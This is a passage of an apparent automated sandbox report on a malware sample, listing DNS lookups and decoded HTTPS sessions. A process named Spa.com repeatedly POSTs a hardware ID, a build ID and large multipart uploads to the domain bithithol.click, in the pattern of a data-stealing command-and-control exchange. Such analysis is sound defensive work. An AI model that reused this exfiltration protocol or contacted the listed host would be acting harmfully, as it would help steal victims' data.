                                                                                                                Dec 24, 2024 13:52:59.543329954 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.543401957 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.543456078 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.543616056 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.543636084 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.550806999 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.550894976 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.550972939 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.551244974 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.551297903 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:00.763854027 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:00.764065981 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:00.766534090 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:00.766556025 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:00.766771078 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:00.767891884 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:00.767932892 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:00.767970085 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:01.644635916 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:01.644705057 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:01.644762039 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:01.644994974 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:01.645009995 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:01.645035028 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:01.645042896 CET44349743104.21.33.227192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 13:52:20.193665981 CET | 58242 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 13:52:20.428658009 CET | 53 | 58242 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 13:52:39.022186995 CET | 53294 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 13:52:39.351145983 CET | 53 | 53294 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 13:52:20.193665981 CET | 192.168.2.4 | 1.1.1.1 | 0x33da | Standard query (0) | UJXheBevpnMncefcEO.UJXheBevpnMncefcEO | A (IP address) | IN (0x0001) | false
Dec 24, 2024 13:52:39.022186995 CET | 192.168.2.4 | 1.1.1.1 | 0xc76 | Standard query (0) | bithithol.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 13:52:20.428658009 CET | 1.1.1.1 | 192.168.2.4 | 0x33da | Name error (3) | UJXheBevpnMncefcEO.UJXheBevpnMncefcEO | none | none | A (IP address) | IN (0x0001) | false
Dec 24, 2024 13:52:39.351145983 CET | 1.1.1.1 | 192.168.2.4 | 0xc76 | No error (0) | bithithol.click | | 104.21.33.227 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 13:52:39.351145983 CET | 1.1.1.1 | 192.168.2.4 | 0xc76 | No error (0) | bithithol.click | | 172.67.151.61 | A (IP address) | IN (0x0001) | false
                                                                                                                • bithithol.click
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 104.21.33.227 | 443 | 7600 | C:\Users\user\AppData\Local\Temp\459250\Spa.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 12:52:40 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: bithithol.click
2024-12-24 12:52:40 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
2024-12-24 12:52:41 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:41 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=t3e33ebibv91ink60n6r33t7i8; expires=Sat, 19 Apr 2025 06:39:20 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=in2oZL3GclA8TGNF7VQFSe8%2FGBJbf4LPxZuR%2BeC5dZwm3rlOgwCOjMt7BT1MOB%2Fh4DP2tg4qo9HdMZ7Jrv6%2FJ5p1axLMF9%2BNC57ZNzrkpLNMCjoQSfpBok5ZG5L1nl8rk1E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70badb68e842cb-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2400&min_rtt=2400&rtt_var=1200&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4212&recv_bytes=906&delivery_rate=188776&cwnd=163&unsent_bytes=0&cid=5a1f8b3c7bfd3c29&ts=851&x=0"
2024-12-24 12:52:41 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-24 12:52:41 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 104.21.33.227 | 443 | 7600 | C:\Users\user\AppData\Local\Temp\459250\Spa.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 12:52:42 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 47
                                                                                                                Host: bithithol.click
2024-12-24 12:52:42 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=VvQOXN--dozp1&j=
2024-12-24 12:52:43 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:43 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=ovg7icb9fqbe568po63f3eoiqt; expires=Sat, 19 Apr 2025 06:39:22 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIsC2ICO%2BQtG%2BxRPo2%2FR4q7fdBsDruzoqy10z88yFgvTiQt9PBNuZnkKonuTyEIBbW05zPufgo2%2BDsSha5bFitWFj%2FfKmUyhQesAoPP39cv3WxADBIqZsPSGTueLdKrLI4I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bae97f00428f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=31753&min_rtt=14242&rtt_var=17217&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=946&delivery_rate=205027&cwnd=100&unsent_bytes=0&cid=ed86b8ce58d83524&ts=899&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 104.21.33.227 | 443 | 7600 | C:\Users\user\AppData\Local\Temp\459250\Spa.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 12:52:45 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=2D2UJO7589V6LA
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 18139
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:45 UTC15331OUTData Raw: 2d 2d 32 44 32 55 4a 4f 37 35 38 39 56 36 4c 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 45 34 46 32 31 32 44 37 34 39 39 38 45 36 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37 0d 0a 2d 2d 32 44 32 55 4a 4f 37 35 38 39 56 36 4c 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 44 32 55 4a 4f 37 35 38 39 56 36 4c 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 0d 0a 2d 2d 32 44 32 55 4a 4f 37 35
                                                                                                                Data Ascii: --2D2UJO7589V6LAContent-Disposition: form-data; name="hwid"D7E4F212D74998E6165F70E3262EAA47--2D2UJO7589V6LAContent-Disposition: form-data; name="pid"2--2D2UJO7589V6LAContent-Disposition: form-data; name="lid"VvQOXN--dozp1--2D2UJO75
2024-12-24 12:52:47 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:47 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=rq6kvr2cra02epvsv7lunrv4m8; expires=Sat, 19 Apr 2025 06:39:26 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s94GRwRgsi%2F122%2BkgmrQ5XXOfDzY7rjPNozQE%2Frzqg7t9p8GXn0yMFn3TE1Rnpn9ZRQqse2BWVkZELktnDhgSSdp4YDUor27X9nh3wCCz25DOU30UPYCDl9QXsnC4w15oOY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70baf90a948c0f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=17867&min_rtt=5884&rtt_var=9911&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19096&delivery_rate=496261&cwnd=220&unsent_bytes=0&cid=4f01772db1ab4a97&ts=2166&x=0"
2024-12-24 12:52:47 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-24 12:52:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 104.21.33.227 | 443 | 7600 | C:\Users\user\AppData\Local\Temp\459250\Spa.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 12:52:48 UTC | 270 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=MTRJJO06
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8724
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:48 UTC | 8724 | OUT | Data Ascii:
                                                                                                                --MTRJJO06
                                                                                                                Content-Disposition: form-data; name="hwid"

                                                                                                                D7E4F212D74998E6165F70E3262EAA47
                                                                                                                --MTRJJO06
                                                                                                                Content-Disposition: form-data; name="pid"

                                                                                                                2
                                                                                                                --MTRJJO06
                                                                                                                Content-Disposition: form-data; name="lid"

                                                                                                                VvQOXN--dozp1
                                                                                                                --MTRJJO06
                                                                                                                Content-Disposit
                                                                                                                2024-12-24 12:52:49 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:49 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=n2dsq7v14ih6u2bq7ttdme0ik7; expires=Sat, 19 Apr 2025 06:39:28 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lXHb8D42SdFumPKaBOhXg58DcicGLOsaUBMpXM0v33UgF5YniM16FRvYqF5i30xQeJnhw4lu59VaHEz%2BdZvvj7MObOH%2FTisHDFkiWkO5MfEI7ckSYCg7aCQk2VzALgXy0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb0ebc588ce8-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1934&min_rtt=1933&rtt_var=726&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9652&delivery_rate=1510605&cwnd=237&unsent_bytes=0&cid=d06ac182e3ebaea2&ts=901&x=0"
                                                                                                                2024-12-24 12:52:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-24 12:52:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                4 | 192.168.2.4 | 49740 | 104.21.33.227 | 443 | 7600 | C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-24 12:52:51 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=6EVNCTOU
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 20377
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:51 UTC | 15331 | OUT | Data Ascii:
                                                                                                                --6EVNCTOU
                                                                                                                Content-Disposition: form-data; name="hwid"

                                                                                                                D7E4F212D74998E6165F70E3262EAA47
                                                                                                                --6EVNCTOU
                                                                                                                Content-Disposition: form-data; name="pid"

                                                                                                                3
                                                                                                                --6EVNCTOU
                                                                                                                Content-Disposition: form-data; name="lid"

                                                                                                                VvQOXN--dozp1
                                                                                                                --6EVNCTOU
                                                                                                                Content-Disposit
                                                                                                                2024-12-24 12:52:52 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=el0n8f134t34s22b2mmm7labcm; expires=Sat, 19 Apr 2025 06:39:31 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Un1as2KKAUgNgoj8FBfsPLOQ6rw8xPKdAu%2BIQ6uwA%2BbQEfrUyeZoOYtnumPNdxu9TPBYqibCtbLyiLbj9wYwciIToI9eY3SEyf8IKs%2B8uwLSYfHiHLU%2FeEycj9Y0FGsGWfE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb1d1e578c96-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=14087&min_rtt=1973&rtt_var=8094&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21328&delivery_rate=1479979&cwnd=188&unsent_bytes=0&cid=9009b58c1f5278c8&ts=1291&x=0"
                                                                                                                2024-12-24 12:52:52 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-24 12:52:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                5 | 192.168.2.4 | 49741 | 104.21.33.227 | 443 | 7600 | C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-24 12:52:53 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=KRE4KMW7W5DD
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1236
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:53 UTC | 1236 | OUT | Data Ascii:
                                                                                                                --KRE4KMW7W5DD
                                                                                                                Content-Disposition: form-data; name="hwid"

                                                                                                                D7E4F212D74998E6165F70E3262EAA47
                                                                                                                --KRE4KMW7W5DD
                                                                                                                Content-Disposition: form-data; name="pid"

                                                                                                                1
                                                                                                                --KRE4KMW7W5DD
                                                                                                                Content-Disposition: form-data; name="lid"

                                                                                                                VvQOXN--dozp1
                                                                                                                --KRE4KMW7W5DD
                                                                                                                2024-12-24 12:52:54 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:54 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=v3avniko7i71gm8nqsn89hivqj; expires=Sat, 19 Apr 2025 06:39:33 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNtYsx6urwJC0yK%2FgTJ939F7FGgR5XLmk%2FsDAqkZATZl53cLYEFxpPOiQD12htWrSVAJX5OXPXpy86PkTTTlQpNe58mc59Fyad9UNjMQBA0543qb61ESxadG5FE7NYaNzWo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb2db8344210-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1974&rtt_var=757&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2146&delivery_rate=1429970&cwnd=244&unsent_bytes=0&cid=b4cb9216ff5b7060&ts=854&x=0"
                                                                                                                2024-12-24 12:52:54 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-24 12:52:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                6 | 192.168.2.4 | 49742 | 104.21.33.227 | 443 | 7600 | C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-24 12:52:56 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=2FZJYP1YF9HPNRO
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 558955
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:56 UTC | 15331 | OUT | Data Ascii:
                                                                                                                --2FZJYP1YF9HPNRO
                                                                                                                Content-Disposition: form-data; name="hwid"

                                                                                                                D7E4F212D74998E6165F70E3262EAA47
                                                                                                                --2FZJYP1YF9HPNRO
                                                                                                                Content-Disposition: form-data; name="pid"

                                                                                                                1
                                                                                                                --2FZJYP1YF9HPNRO
                                                                                                                Content-Disposition: form-data; name="lid"

                                                                                                                VvQOXN--dozp1
                                                                                                                --2FZJY
                                                                                                                2024-12-24 12:52:59 UTC  1138  IN  HTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:59 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=lk8j1brc55efevdm79nnt8qugv; expires=Sat, 19 Apr 2025 06:39:38 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oos8%2F%2BQTkgeZJsXxgc2IAbl29ezTJO%2FoZCnfNK8Fd9ZvBsan1OEx1lm9V32c2m1wvtCXtxKcg08%2FESU8I%2FkFy%2BLNc3iqWCrh1AlXGWWPXC1U7i07XfF4UV51ON4z4S3XRwg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb3ccdbcc434-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2576&min_rtt=1649&rtt_var=1281&sent=310&recv=579&lost=0&retrans=0&sent_bytes=2835&recv_bytes=561454&delivery_rate=1770770&cwnd=196&unsent_bytes=0&cid=2db4056f97fc23e9&ts=3260&x=0"


                                                                                                                Session ID:7
                                                                                                                Source IP:192.168.2.4
                                                                                                                Source Port:49743
                                                                                                                Destination IP:104.21.33.227
                                                                                                                Destination Port:443
                                                                                                                PID:7600
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                                2024-12-24 12:53:00 UTC  263  OUT  POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 82
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:53:00 UTC  82  OUT  Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 26 6a 3d 26 68 77 69 64 3d 44 37 45 34 46 32 31 32 44 37 34 39 39 38 45 36 31 36 35 46 37 30 45 33 32 36 32 45 41 41 34 37
                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=VvQOXN--dozp1&j=&hwid=D7E4F212D74998E6165F70E3262EAA47
                                                                                                                2024-12-24 12:53:01 UTC  1132  IN  HTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:53:01 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=rqmcuma7mthhiojs14mopo77tq; expires=Sat, 19 Apr 2025 06:39:40 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z7%2FcVK%2B%2FZVA2o2pLFHUBH3Oqt2Lue2aGqsIrZuCQnLVZPG%2BXfoz1Mi0aKK05Phgs%2FG7w45orcT2E3aiRpq%2Fx6Aqdis%2BVwY8Mg2otsL8TxnF%2FNBNorGCemndeIefqY1KCzzs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bb597917437f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
